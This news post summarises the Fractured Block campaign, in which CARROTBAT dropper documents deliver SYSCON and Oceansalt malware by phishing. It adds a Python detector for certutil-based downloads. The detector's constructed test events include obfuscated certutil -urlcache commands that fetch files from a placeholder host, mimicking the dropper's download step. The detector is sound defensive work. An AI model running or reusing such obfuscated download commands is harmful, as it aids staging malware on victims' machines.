CARROTBAT Dropper Delivers SYSCON and OceanSalt Malware

Delaware, USA – December 4, 2018 – The Fractured Block campaign started in March 2018 and has intensified significantly in recent months. Researchers at Palo Alto Networks’ Unit 42 division have tracked it from the very beginning and shared their findings in a blog post. The campaign targets Southeast Asia, and the malware used suggests that the campaign could be conducted by an APT group from China. Adversaries send phishing emails carrying CARROTBAT dropper files with embedded decoy documents. CARROTBAT is an uncommon dropper that supports various types of documents and uses command obfuscation. Researchers discovered 29 unique samples used in 11 decoy documents. At the beginning of the campaign the adversaries used the FTP-based RAT SYSCON as the final payload, but in the last months they switched to the recently discovered Oceansalt malware. Most decoy documents were crafted to lure victims in Korea and had subject matter related to cryptocurrencies or timely political events. After the malicious attachment is executed, CARROTBAT opens the lure document and downloads a remote file using the built-in Microsoft Windows certutil command.

The threat actors behind the Fractured Block campaign used their infrastructure in an attack on a British government agency in December 2017, so their field of operation is not limited to Southeast Asia. To detect the CARROTBAT dropper and the SYSCON and Oceansalt malware with your security solutions, you can use rules from Threat Detection Marketplace.
OceanSalt AND SYSCON Malware Detector: https://tdm.socprime.com/tdm/info/1396/
CARROTBAT Malware Dropper Detector: https://tdm.socprime.com/tdm/info/1395/
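
As an added example (not taken from the Unit 42 report or the Threat Detection Marketplace rules), here is a minimal detection for the certutil download step described above, run over constructed process command lines. It assumes the download uses certutil's -urlcache option and that obfuscation is limited to cmd.exe caret escapes and inserted quotes; neither detail is stated on this page.

```python
import re

# Constructed process-creation command lines for testing (not from real samples).
SAMPLE_EVENTS = [
    'cmd.exe /c c^e^r^t^u^t^i^l -url""cache -split -f '
    'https://files.example.invalid/1.txt "%TEMP%\\1.txt"',
    'C:\\Windows\\System32\\CertUtil.exe /urlcache /f '
    'http://files.example.invalid/a.cab a.cab',
    'certutil.exe -hashfile C:\\Users\\alice\\report.docx SHA256',
    'certutil -urlcache * delete',
    'notepad.exe C:\\notes\\certutil-urlcache-howto.txt',
]

# certutil as a program token, bare or at the end of a path, optional .exe.
CERTUTIL_RE = re.compile(r'(?:^|[\s\\/&|(])certutil(?:\.exe)?(?=\s|$)')
# The -urlcache option; certutil accepts "-" or "/" as the option prefix.
URLCACHE_RE = re.compile(r'(?:^|\s)[-/]urlcache\b')
# A remote source on the same command line.
URL_RE = re.compile(r'\b(?:https?|ftp)://')


def normalize(cmdline):
    """Undo the assumed obfuscation: caret escapes, inserted quotes, padding.

    Other techniques (environment-variable substrings, for example) are not
    handled here and would need their own normalization step.
    """
    stripped = cmdline.replace('^', '').replace('"', '')
    return re.sub(r'\s+', ' ', stripped).strip().lower()


def is_certutil_download(cmdline):
    """True when certutil is invoked with -urlcache and a remote URL."""
    s = normalize(cmdline)
    return bool(CERTUTIL_RE.search(s) and URLCACHE_RE.search(s)
                and URL_RE.search(s))


def scan(events):
    """Return the original command lines that match the detection."""
    return [e for e in events if is_certutil_download(e)]


if __name__ == '__main__':
    for hit in scan(SAMPLE_EVENTS):
        print('ALERT certutil remote download:', hit)
```

Hash calculation, local cache cleanup and a file name that merely contains "certutil-urlcache" are not flagged, which keeps routine administrative use out of the alert stream.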